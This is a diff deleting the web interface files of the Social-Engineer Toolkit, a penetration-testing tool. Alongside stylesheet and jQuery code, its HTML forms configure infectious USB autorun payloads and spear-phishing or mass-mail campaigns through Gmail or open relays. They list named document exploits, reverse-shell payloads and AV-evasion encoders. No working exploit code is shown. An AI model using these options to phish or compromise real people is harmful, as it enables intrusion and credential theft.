-function(a){var b=this[0];if(a)return this.each(function(e){c.offset.setOffset(this,a,e)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);var d=b.getBoundingClientRect(),f=b.ownerDocument;b=f.body;f=f.documentElement;return{top:d.top+(self.pageYOffset||c.support.boxModel&&f.scrollTop||b.scrollTop)-(f.clientTop||b.clientTop||0),left:d.left+(self.pageXOffset||c.support.boxModel&&f.scrollLeft||b.scrollLeft)-(f.clientLeft||b.clientLeft||0)}}:function(a){var b=
-this[0];if(a)return this.each(function(r){c.offset.setOffset(this,a,r)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);c.offset.initialize();var d=b.offsetParent,f=b,e=b.ownerDocument,j,i=e.documentElement,o=e.body;f=(e=e.defaultView)?e.getComputedStyle(b,null):b.currentStyle;for(var k=b.offsetTop,n=b.offsetLeft;(b=b.parentNode)&&b!==o&&b!==i;){if(c.offset.supportsFixedPosition&&f.position==="fixed")break;j=e?e.getComputedStyle(b,null):b.currentStyle;
-k-=b.scrollTop;n-=b.scrollLeft;if(b===d){k+=b.offsetTop;n+=b.offsetLeft;if(c.offset.doesNotAddBorder&&!(c.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(b.nodeName))){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=d;d=b.offsetParent}if(c.offset.subtractsBorderForOverflowNotVisible&&j.overflow!=="visible"){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=j}if(f.position==="relative"||f.position==="static"){k+=o.offsetTop;n+=o.offsetLeft}if(c.offset.supportsFixedPosition&&
-f.position==="fixed"){k+=Math.max(i.scrollTop,o.scrollTop);n+=Math.max(i.scrollLeft,o.scrollLeft)}return{top:k,left:n}};c.offset={initialize:function(){var a=s.body,b=s.createElement("div"),d,f,e,j=parseFloat(c.curCSS(a,"marginTop",true))||0;c.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});b.innerHTML="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";
-a.insertBefore(b,a.firstChild);d=b.firstChild;f=d.firstChild;e=d.nextSibling.firstChild.firstChild;this.doesNotAddBorder=f.offsetTop!==5;this.doesAddBorderForTableAndCells=e.offsetTop===5;f.style.position="fixed";f.style.top="20px";this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15;f.style.position=f.style.top="";d.style.overflow="hidden";d.style.position="relative";this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5;this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==j;a.removeChild(b);
-c.offset.initialize=c.noop},bodyOffset:function(a){var b=a.offsetTop,d=a.offsetLeft;c.offset.initialize();if(c.offset.doesNotIncludeMarginInBodyOffset){b+=parseFloat(c.curCSS(a,"marginTop",true))||0;d+=parseFloat(c.curCSS(a,"marginLeft",true))||0}return{top:b,left:d}},setOffset:function(a,b,d){if(/static/.test(c.curCSS(a,"position")))a.style.position="relative";var f=c(a),e=f.offset(),j=parseInt(c.curCSS(a,"top",true),10)||0,i=parseInt(c.curCSS(a,"left",true),10)||0;if(c.isFunction(b))b=b.call(a,
-d,e);d={top:b.top-e.top+j,left:b.left-e.left+i};"using"in b?b.using.call(a,d):f.css(d)}};c.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),d=this.offset(),f=/^body|html$/i.test(b[0].nodeName)?{top:0,left:0}:b.offset();d.top-=parseFloat(c.curCSS(a,"marginTop",true))||0;d.left-=parseFloat(c.curCSS(a,"marginLeft",true))||0;f.top+=parseFloat(c.curCSS(b[0],"borderTopWidth",true))||0;f.left+=parseFloat(c.curCSS(b[0],"borderLeftWidth",true))||0;return{top:d.top-
-f.top,left:d.left-f.left}},offsetParent:function(){return this.map(function(){for(var a=this.offsetParent||s.body;a&&!/^body|html$/i.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(f){var e=this[0],j;if(!e)return null;if(f!==w)return this.each(function(){if(j=wa(this))j.scrollTo(!a?f:c(j).scrollLeft(),a?f:c(j).scrollTop());else this[d]=f});else return(j=wa(e))?"pageXOffset"in j?j[a?"pageYOffset":
-"pageXOffset"]:c.support.boxModel&&j.document.documentElement[d]||j.document.body[d]:e[d]}});c.each(["Height","Width"],function(a,b){var d=b.toLowerCase();c.fn["inner"+b]=function(){return this[0]?c.css(this[0],d,false,"padding"):null};c.fn["outer"+b]=function(f){return this[0]?c.css(this[0],d,false,f?"margin":"border"):null};c.fn[d]=function(f){var e=this[0];if(!e)return f==null?null:this;if(c.isFunction(f))return this.each(function(j){var i=c(this);i[d](f.call(this,j,i[d]()))});return"scrollTo"in
-e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window);jQuery.noConflict();

src/commandcenter/files/style.css

@@ -1,468 +0,0 @@
-
-/* Lite CSS browser reset - DigiP */
-ul li, li, ol, table, tr, td, div, p, blockquote, body, h1, h2, h3, a, img {
-border:0px;
-margin:0px;
-padding:0px;
-border-collapse:collapse;
-font-weight:normal;
-}
-
-
-body {
-background-color:#000;
-background-image:url(header.jpg);
-background-repeat:repeat-x;
-color:#fff;
-font-family:"trebuchet ms",arial,sans-serif,"sans serif";
-font-size:16px;
-}
-
-a {
-color:#468dab;
-text-decoration:none;
-}
-
-a:hover {
-color:#41baed;
-text-decoration:underline;
-}
-
-a img {
-border:none;
-border-style:none;
-}
-
-h1 {
-font-size:26px;
-color:#468dab;
-border-bottom: solid #468dab 1px;
-position:relative;
-text-align:left;
-width:97%;
-margin:2px auto 2px auto;
-}
-
-.full {
-font-size:26px;
-color:#468dab;
-border-bottom: solid #468dab 1px;
-position:relative;
-text-align:left;
-width:100%;
-margin:2px auto 2px auto;
-}
-
-h2{
-font-size:22px;
-margin-bottom:20px;
-margin-top:10px;
-color:#468dab;
-border-bottom: solid #468dab 1px;
-position:relative;
-text-align:left;
-}
-
-h3 {
-margin-top:15px;
-font-size:18px;
-margin-bottom:20px;
-color:#468dab;
-border-bottom: solid #468dab 1px;
-position:relative;
-text-align:left;
-}
-
-h4 {
-margin-top:15px;
-font-size:18px;
-margin-bottom:20px;
-color:#468dab;
-border-bottom: solid #468dab 1px;
-position:relative;
-text-align:left;
-}
-
-h1 a, h2 a, h3 a, h4 a {
-text-decoration:none;
-}
-
-h1 a:hover, h2 a:hover, h3 a:hover, h4 a:hover {
-text-decoration:none;
-}
-
-.dates:before {
-	padding:10px 5px 20px 0px;
-	margin-bottom:10px;
-	content:url(date-icon.png); 
-	position:relative;
-	top:10px;
-	left:-5px;
-}
-
-.dates {
-border-bottom:none;
-margin:0px 20px 20px 20px;
-position:relative;
-float:right;
-font-size:12px;
-}
-
-
-
-p {
-margin-bottom:20px;
-}
-
-#header {
-width:1110px;
-height:335px;
-margin-left:auto;
-margin-right:auto;
-}
-
-#logo {
-
-}
-
-#nav {
-text-align:justified;
-
-width:1100px;
-}
-
-.nav-button {
-padding:2px 1px 3px 1px;
-}
-
-.nav-button:hover {
-background-color:#121212;
-padding:2px 0px 2px 0px;
-border-left:solid #444 1px;						/*	Give buttons slight 3d effect	*/
-border-right:solid #222 1px;
-border-bottom:solid #222 1px;
-}
-
-#content {
-background-color:#212121;
-display:block;
-text-align:justify;
-padding:20px;
-width:960px;
-height:auto;
-margin-left:auto;
-margin-right:auto;
-margin-bottom:15px;
-border-top:solid #468dab 3px;					/*	two-toned border	*/
-border-right:solid #468dab 3px;
-border-bottom:solid #3d738a 3px;
-border-left:solid #3d738a 3px;
--webkit-border-radius: 15px; 					/*	webkit non standard, older browser versions 	*/
--moz-border-radius: 0px 15px 15px 15px;			/*	mozilla non standard, older browser versions 	*/
-border-radius: 0px 15px 15px 15px;
-}
-
-#content-home {
-background-color:#0f0f0f;
-display:block;
-text-align:justify;
-padding:20px;
-width:960px;
-height:auto;
-margin-left:auto;
-margin-right:auto;
-margin-bottom:15px;
-border-top:solid #468dab 3px;					/*	two-toned border	*/
-border-right:solid #468dab 3px;
-border-bottom:solid #3d738a 3px;
-border-left:solid #3d738a 3px;
--webkit-border-radius: 15px; 					/*	webkit non standard, older browser versions 	*/
--moz-border-radius: 0px 15px 15px 15px;			/*	mozilla non standard, older browser versions 	*/
-border-radius: 0px 15px 15px 15px;
-}
-
-.post-home {
-margin-bottom:25px;
-}
-
-.post-home .entry p {
-font-size:16px;
-}
-
-#content-hassidebar {
-background-color:#212121;
-display:table;
-position:relative;
-clear:both;
-text-align:justify;
-padding:20px;
-width:960px;
-height:auto;
-margin-left:auto;
-margin-right:auto;
-margin-bottom:15px;
-border-top:solid #468dab 3px;					/*	two-toned border	*/
-border-right:solid #468dab 3px;
-border-bottom:solid #3d738a 3px;
-border-left:solid #3d738a 3px;
--webkit-border-radius: 15px; 					/*	webkit non standard, older browser versions 	*/
--moz-border-radius: 0px 15px 15px 15px;			/*	mozilla non standard, older browser versions 	*/
-border-radius: 0px 15px 15px 15px;
-}
-
-.post {
-border:solid #333 1px;
-margin-bottom:25px;
-background-color:#0f0f0f;
--webkit-border-radius: 15px; 					/*	webkit non standard, older browser versions 	*/
--moz-border-radius: 0px 15px 15px 15px;			/*	mozilla non standard, older browser versions 	*/
-border-radius: 0px 15px 15px 15px;
-}
-
-.post-hassidebar {
-margin:15px -10px 25px 15px;
-border:solid #333 1px;
-background-color:#0f0f0f;
--webkit-border-radius: 15px; 					/*	webkit non standard, older browser versions 	*/
--moz-border-radius: 0px 15px 15px 15px;			/*	mozilla non standard, older browser versions 	*/
-border-radius: 0px 15px 15px 15px;
-width:630px;
-float:left;
-display:block;
-}
-
-.post .entry, .post-hassidebar .entry {
-padding:15px;
-}
-
-.post .entry p {
-font-size:16px;
-}
-
-.entry img {
-max-width:550px;
-width: expression(this.width > 550 ? 550: true);	/* IE hack since it doesn't recognize max-width standard	*/
-}
-
-.entry object {
-display:block;
-position:relative;
-clear:both;
-margin:15px auto 15px auto;
-border-top:solid #122d39 7px;
-border-right:solid #122d39 7px;
-border-bottom:solid #0f232b 7px;
-border-left:solid #0f232b 7px;
-
--webkit-border-radius: 0px 7px 7px 7px; 					/*	webkit non standard, older browser versions 	*/
--moz-border-radius: 7px;			/*	mozilla non standard, older browser versions 	*/
-border-radius: 0px 7px 7px 7px;
-
-max-width:550px;
-width: expression(this.width > 550 ? 550: true);	/* IE hack since it doesn't recognize max-width standard	*/
-}
-
-.entry embed {
-max-width:550px;
-width: expression(this.width > 550 ? 550: true);	/* IE hack since it doesn't recognize max-width standard	*/
-}
-
-
-#footer {
-margin-bottom:20px;
-}
-
-#copyright{
-font-size:12px;
-}
-
-.navigation {
-position:relative;
-clear:both;
-}
-
-.navigation .nav-old {
-float:left;
-position:relative;
-}
-
-.navigation .nav-newer {
-float:right;
-position:relative;
-}
-
-.sidebarWidgetDigi {
-width:230px;
-display:block;
-padding:20px;
-}
-
-.sidebarWidgetDigiH4 {
-position:relative;
-border:none;
-margin-bottom:5px;
-}
-
-#sidebar {
-width:260px;
-position:relative;
-margin:15px 15px 25px 20px;
-padding:5px 15px 5px 5px;
-display:block;
-float:right;
-border:solid #333 1px;
-background-color:#0f0f0f;
--webkit-border-radius: 15px; 					/*	webkit non standard, older browser versions 	*/
--moz-border-radius: 0px 15px 15px 15px;			/*	mozilla non standard, older browser versions 	*/
-border-radius: 0px 15px 15px 15px;
-}
-
-
-
-#calendar_wrap table {
-background-color:#ccc;
-border: solid #ccc 1px;
-width:100%;
-}
-
-#wp-calendar th {
-background-color:#aaa; 
-color:#000;
-width:10px;
-text-align:center;
-}
-
-#wp-calendar td {
-width:10px;
-background-color:#ccc;
-text-indent:7px;
-color:#000;
-}
-
-#wp-calendar td a {
-color:#005da5;
-}
-
-#wp-calendar td:hover a:hover {
-color:#f5f5f5;
-}
-
-#wp-calendar td:hover {
-background-color:#606060;
-color:#000;
-}
-
-#comment {
-width:500px;
-padding:0px;
-margin-left:auto;
-margin-right:auto;
-}
-
-#commentlist {
-list-style-type:none;
-border-collapse:collapse;
-margin:0px;
-padding:0px;
-}
-
-#commentlist li { 
-position:relative;
-margin-bottom:20px;
-padding:10px 10px 60px 10px;
-border:solid #606060 2px; 
-background-color:#202020; 
-color:#fff;
-
--moz-border-radius:8px;
--webkit-border-radius:8px;
-border-radius:8px;
-
-}
-
-img.avatar {
-position:relative;
-float:left;
-margin:16px 20px 10px 0px;
-border:solid #424242 12px;
--moz-border-radius:8px;
--webkit-border-radius:8px;
-border-radius:8px;
-clear:both;
-}
-
-#digi-comments {
-position:relative;
-width: 670px;
-margin:30px auto 30px auto;
-display:block;
-padding:50px;
-background-color:#000;
-clear:both;
--moz-border-radius:5px 5px 10px 10px;
--webkit-border-radius:5px 5px 10px 10px;
-border-radius:5px 5px 10px 10px;
-}
-
-/* code is old school - Should switch to plugin instead, looks much better and has syntax highlighting, see - http://wordpress.org/extend/plugins/codecolorer/installation/ */
-code {
-	color: #acacac;
-	background: #222222;
-	border:solid #434343 1px;
-	font-size: 14px;
-	margin: 0px;
-	padding: 15px;
-	display: block;
-	font:11px Monaco, monospace;
-}
-
-.shr-bookmarks { /* if using sexy share plugin */
-float:left;
-position:relative;
-margin-right:-30px;
-margin-top:-0px;
-margin-bottom:20px;
-clear:both;
-width:550px;
-}
-
-.pages_ {
-border:solid #606060 2px;
-padding:2px 7px 2px 7px;
-margin:0px 2px 0px 0px;
-background-color:#c4c4c4;
-}
-
-.pages_:hover {
-border:solid #606060 2px;
-padding:2px 7px 2px 7px;
-margin:0px 2px 0px 0px;
-background-color:#fff;
-}
-
-a .pages_:hover  {
-color:#000;
-}
-
-.archives {
-clear:both;
-}
-
-ul li {
-text-align:left;
-font-size:14px;
-}
-
-#socialmedia2 {
-display:none;
-}
-
-#socialmedia {
-position:fixed;
-right:8px;
-top:10%;
-width:50px;
-height:150px;
-z-index:9999;
-line-height:10px;
-}

src/commandcenter/footer

@@ -1,16 +0,0 @@
-	<div id="footer">
-		<center><span style="color: rgb(102, 102, 102);">Visit us on</span> <span style="color: rgb(70, 141, 171);">irc.freenode.net</span> <span style="color: rgb(102, 102, 102);">#backtrack-linux or #social-engineer</span></center>
-		<div id="copyright">
-		<center><a href="http://www.secmaniac.com/">© SecManiac.com All rights reserved.</a></center>
-		</div>
-	
-	</div>
-
-		
-
-	<div id="socialmedia">
-		<a href="http://www.secmaniac.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
-		<a href="http://twitter.com/hackingdave"><img src="files/tweet.png" alt="Twitter" title="Follow Me On Twitter!"></a>
-	</div>
-	
-	</body></html>

src/commandcenter/header

@@ -1,58 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>
-
-
-<title>The Social-Engineer Toolkit Web Interface</title>
-<meta http-equiv="content-type" content="text/html; charset=UTF-8">
-<meta http-equiv="X-UA-Compatible" content="IE=100"> <!-- Force IE8 Compatibility mode OFF -->
-
-<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.secmaniac.com/wp-content/themes/SecManiac2010/favicon.ico">
-<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://www.secmaniac.com/wp-content/themes/SecManiac2010/favicon.ico">
-<link rel="stylesheet" href="files/style.css" type="text/css">
-<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.secmaniac.com/feed/">
-<link rel="alternate" type="text/xml" title="RSS .92" href="http://www.secmaniac.com/feed/rss/">
-<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://www.secmaniac.com/feed/atom/">
-<link rel="pingback" href="http://www.secmaniac.com/xmlrpc.php">
-
-	
-<link rel="alternate" type="application/rss+xml" title="SecManiac.com » Feed" href="http://www.secmaniac.com/feed/">
-<link rel="alternate" type="application/rss+xml" title="SecManiac.com » Comments Feed" href="http://www.secmaniac.com/comments/feed/">
-<script src="files/ga.js" async="" type="text/javascript"></script><script type="text/javascript" src="files/jquery.js"></script>
-<script type="text/javascript" src="files/external-tracking.js"></script>
-<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.secmaniac.com/xmlrpc.php?rsd">
-<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.secmaniac.com/wp-includes/wlwmanifest.xml"> 
-<link rel="index" title="SecManiac.com" href="http://www.secmaniac.com/">
-
-</head><body>
-
-	<div id="header">
-	
-	<div id="socialmedia2">
-		<a style="" href="http://www.secmaniac.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
-		<a style="" href="http://twitter.com/hackingdave"><img src="files/tweet.png" alt="Twitter" title="Follow Me On Twitter!"></a>
-	</div>
-	
-		<div id="logo">
-		<a href="./"><img src="files/logo.png" alt="SecManiac.com"></a>
-		</div>
-		
-		<div id="nav">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="./"><img class="nav-button" src="files/main.png" alt="MAIN"></a><a href="/updates"><img class="nav-button" src="files/updates.png" alt="updates"></a>
-
-
-		</div>
-		
-	</div>
-	
-	<br> 
-	
-	<div id="content">
-		<h1><a href="http://www.secmaniac.com/">The Social-Engineer Toolkit (SET) Web Interface</a></h1>
-		<br><br>
-<style type="text/css">
-option {
- color: white;
- background-color: black;
-}
-</style>
-<FONT FACE="sans serif" size="3">
-

src/commandcenter/infect.site

@@ -1,116 +0,0 @@
-		<div class="post">
-		<h4 class="dates">Social-Engineer Toolkit (SET) Infectious Media Attack Vector</h4>
-			<div class="entry">
-
-				<h2>Infectious Media Generator</h2>
-Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack.<br><br>The Infectious USB/CD/DVD method will create an autorun.inf file and a Metasploit payload. When the DVD/USB/CD is inserted, it will automatically run if autorun is enabled.<br><br>
-<br><p><b>Infectious Media Generator</b></p>
-<form action="/infect_post" method="POST">
-
-<style type="text/css">
-option {
- color: white;
- background-color: black;
-}
-</style>
-<FONT FACE="sans serif" size="3">
-
-<select name="attack" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">File-Format Exploits</option>
-<option value="2">Standard Metasploit Executables</option>
-</select>
-<br><br>
-Enter the IP address for the reverse connection (payload): <input type="text" name="externalip" size="10" STYLE="font-family : arial; font-size : 7pt" /><br />
-<br><p><b>File-Format Exploits (Only)</b><p>
-<select name="phish_attack" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">SET Custom Written DLL Hijacking</option>
-<option value="2">SET Custom Written Document UNC LM SMB Capture Attack</option>
-<option value="3">Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow</option>
-<option value="4">Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)</option>
-<option value="5">Adobe Flash Player 'Button' Remote Code Execution</option>
-<option value="6">Adobe CoolType SING Table 'uniqueName'</option>
-<option value="7">Adobe Flash Player 'newfunction'</option>
-<option value="8">Adobe Collab.collectEmailInfo</option>
-<option value="9">Adobe Collab.getIcon Overflow</option>
-<option value="10">Adobe JBIG2Decode Memory Corruption</option>
-<option value="11">Adobe PDF Embedded EXE SE</option>
-<option value="12">Adobe util.printf() Buffer Overflow</option>
-<option value="13">Custom EXE to VBA (sent via RAR)</option>
-<option value="14">Adobe U3D CLODProgressiveMeshDeclration</option>
-<option value="15">Adobe PDF Embedded EXE SE (NOJS)</option>
-<option value="16">Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow</option>
-<option value="17">Nuance PDF Reader v6.0 Launch Stack Buffer Overflow</option>
-<optionv alue="18">Adobe Reader u3D Memory Corruption Vulnerability</option>
-</select>
-<br><br>
-<p><b>Payload Selection Options (Metasploit Executable and File Format Exploits)</b></p>
-<select name="payload_selection" STYLE="font-family : arial; font-size : 7pt">
-<option value"1">Windows Shell Reverse TCP</option>
-<option value"2" selected="selected">Windows Reverse TCP Meterpreter</option>
-<option value"3">Windows Reverse TCP VNC DLL</option>
-<option value"4">Windows Bind Shell</option>
-<option value"5">Windows Bind Shell X64</option>
-<option value"6">Windows Shell Reverse TCP X64</option>
-<option value"7">Windows Meterpreter Reverse TCP X64</option>
-<option value"8">Windows Meterpreter Egress Buster</option>
-<option value"9">Windows Meterpreter Reverse HTTPS</option>
-<option value"10">Windows Meterpreter Reverse DNS</option>
-</select>
-<br>
-<br>Import your own: <input type="file" name="payload_selection_filename" size="5" STYLE="font-family : arial; font-size : 7pt">
-<br><br>
-<p><b>Encoding Options</b></p>
-<select name="encoding" STYLE="font-family : arial; font-size : 7pt">
-<option value"1">avoid_utf8_tolower</option>
-<option value"2">shikata_ga_nai</option>
-<option value"3">alpha_mixed</option>
-<option value"4">alpha_upper</option>
-<option value"5">call4_dword_xor</option>
-<option value"6">countdown</option>
-<option value"7">fnstenv_mov</option>
-<option value"8">jmp_call_additive</option>
-<option value"9">nonalpha</option>
-<option value"10">nonupper</option>
-<option value"11">unicode_mixed</option>
-<option value"12">unicode_upper</option>
-<option value"13">alpha2</option>
-<option value"14">No Encoding</option>
-<option value"15">Multi-Encoder</option>
-<option value"16" selected="selected">Backdoored Executable</option>
-</select>
-<br><br>
-<p><b>Default Port for Listener</b></p>
-Enter the default port: <input type="text" name="port" size="7" value="443" STYLE="font-family : arial; font-size : 7pt"/>
-<br><br>
-<p><b>For the Custom SET DLL Hijacking Attack Vector, select application to attack</b></p>
-<br>
-<select name="dll_hijack" STYLE="font-family : arial; font-size : 7pt">
-<option value"1">Windows Address Book (Universal)</option>
-<option value"2">Microsoft Help and Support Center</option>
-<option value"3">Wscript (XP)</option>
-<option value"4">Microsoft Office PowerPoint 2007</option>
-<option value"5">Microsoft Group Converter</option>
-<option value"6">Safari v5.0.1</option>
-<option value"7">FireFox <= 3.6.8</option>
-<option value"8">Microsoft PowerPoint 2010</option>
-<option value"9">Microsoft PowerPoint 2007</option>
-<option value"10">Microsoft Visio 2010</option>
-<option value"11">Microsoft Word 2007</option>
-<option value"12">Microsoft PowerPoint 2007</option>
-<option value"13">Microsoft Windows Media Encoder 9</option>
-<option value"14">Windows 7 and Vista Backup Utility</option>
-<option value"15">Encase</option>
-<option value"16">IBM Rational License Key Administrator</option>
-<option value"17">Microsoft RDP</option>
-</select>
-<br>
-<br>
-<CHECKHERE>
-<input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
-</form>
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/main.site

@@ -1,27 +0,0 @@
-				
-		<div class="post">
-		<h4 class="dates">The Social-Engineer Toolkit (SET) HomePage</h4>
-			<div class="entry">
-				<h2>SET Web Interface</h2>
-				<center><br>
-				<img src="./files/setman.jpg" alt="the social-engineer toolkit logo"  /> 
-				</center><br>
-				<p>
-The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET has quickly become a standard tool in a penetration testers arsenal. Use SET for Good, not Evil :-( SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. <br><br>Welcome to the Social-Engineer Toolkit (SET) Web Interface. This is a work in progress and first release of the toolkit, please report any bugs to davek@secmaniac.com. There are already a few improvements that will be made after the release (in the short term). I would like to add the ability to eliminate certain choices based off your selection. For example if you were to select Java Applet attack vector, it would remove the options for the multi-attack. Again, this is the second release and a work in progress at that, if you find any bugs let me know!
-<br>
-<br>
-<center><b>Select the attack vector you want:</b>
-<br><br>
-<a href="/social_engineering">Social-Engineering Attacks</a><br><br>
-<a href="/fasttrack">Fast-Track Penetration Testing</a><br>
-</center>
-<br><br>
-Select the attack vector that you want to perform. The Social-Engineering attacks are more geared towards what SET was originally designed to attack, the human element. The second attack vectors is from the popular Fast-Track tool that is now incorporated into SET. These attack vectors are primarily targetted at direct attacks and exploits and allows for a penetration testing framework.
-</p>
-		
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/mass_mailer.site

@@ -1,26 +0,0 @@
-		<div class="post">
-		<h4 class="dates">Social-Engineer Toolkit (SET) Mass Mailer</h4>
-			<div class="entry">
-
-				<h2>Mass Mailer Options</h2>
-Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack.<br><br>
-<br><p><b>Spear-Phishing Attack Methods</b></p>
-<form action="/mass_mailer_post" method="POST">
-
-<style type="text/css">
-option {
- color: white;
- background-color: black;
-}
-</style>
-<FONT FACE="sans serif" size="3">
-<CHECKHERE>
-<br><br>
-<input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
-</form>
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/phish.moo

@@ -1,33 +0,0 @@
-<br><br>
-<p><b>Web Attack Email Options through SET Config is turned to ON</b><p>
-<input type="checkbox" name="webattack_email" value="1"> E-Mail Attack Single Email Address<br>				
-<input type="checkbox" name="webattack_email" value="2"> E-Mail Attack Mass Mailer<br>
-<br>
-If your using mass emailer, browser to file with email addresses: <input type="file" name="massmailer_file" size="5">
-<br>
-<br>
-Enter who you want to send the email to: <input type="text" name="emailto" /><br />
-<br><br>
-<input type="checkbox" name="webattack_account" value="1"> Use a GMAIL account for your email attack<br>
-<input type="checkbox" name="webattack_account" value="2"> Use your own open-relay SMTP Server<br>
-<br><br>
-<p><b>THIS OPTION FOR OPEN-RELAY ONLY</b></p>
-<br>
-Enter your email address you want to come from: <input type="text" name="emailfrom_relay" /><br />
-Enter your username for open relay (leave blank if there is none): <input type="text" name="username_relay" /><br />
-Enter your password for open relay (leave blank if there is none): <input type="password" name="password_relay" /><br />
-Enter the SMTP Server address for the open relay: <input type="text" name="smtp_relay" /><br/>
-Enter the port number for the SMTP server: <input type="text" name="smtp_port_relay" value="25" size="3" /><br/>
-<br><br>
-<p><b>THIS OPTION FOR GMAIL ATTACK ONLY!</b></p><br>
-Enter your email address: <input type="text" name="emailfrom" /><br />
-Enter your password for the email address: <input type="password" name="password" /><br />
-<br><br>
-<p><b>Required fields below</b></p>
-Enter the subject for the email: <input type="text" name="subject" /><br />
-<br><br>
-<input type="checkbox" name="webattack_message" value="1"> Use HTML for the email attack<br>
-<input type="checkbox" name="webattack_message" value="2"> Use Plain text for the email attack<br>
-<br><br>
-Enter your email message here<br><TEXTAREA NAME="comments" COLS=40 ROWS=6></TEXTAREA>
-<br>

src/commandcenter/phish.site

@@ -1,174 +0,0 @@
-		<div class="post">
-		<h4 class="dates">Social-Engineer Toolkit (SET) Spear-Phishing Attack Vector</h4>
-			<div class="entry">
-
-				<h2>Spear-Phishing Attack Vector Options</h2>
-Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack. For example for Credential Harvester you would only select the attack method and which site to clone.<br><br>
-<br><p><b>Spear-Phishing Attack Methods</b></p>
-<form action="/phish_post" method="POST">
-
-<style type="text/css">
-option {
- color: white;
- background-color: black;
-}
-</style>
-<FONT FACE="sans serif" size="3">
-
-<select name="attack" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">Perform a Mass Mail Email Attack</option>
-</select>
-<br><br>
-<p><b>Client-Side Attack Vector (Mass Email Attack and File Format Payload ONLY)</b><p>
-<select name="phish_attack" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">SET Custom Written DLL Hijacking</option>
-<option value="2">SET Custom Written Document UNC LM SMB Capture Attack</option>
-<option value="3">Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow</option>
-<option value="4">Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)</option>
-<option value="5">Adobe Flash Player 'Button' Remote Code Execution</option>
-<option value="6">Adobe CoolType SING Table 'uniqueName'</option>
-<option value="7">Adobe Flash Player 'newfunction'</option>
-<option value="8">Adobe Collab.collectEmailInfo</option>
-<option value="9">Adobe Collab.getIcon Overflow</option>
-<option value="10">Adobe JBIG2Decode Memory Corruption</option>
-<option value="11">Adobe PDF Embedded EXE SE</option>
-<option value="12">Adobe util.printf() Buffer Overflow</option>
-<option value="13">Custom EXE to VBA (sent via RAR)</option>
-<option value="14">Adobe U3D CLODProgressiveMeshDeclration</option>
-<option value="15">Adobe PDF Embedded EXE SE (NOJS)</option>
-<option value="16">Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow</option>
-<option value="17">Apple QuickTime PICT PnSize Buffer Overflow</option>
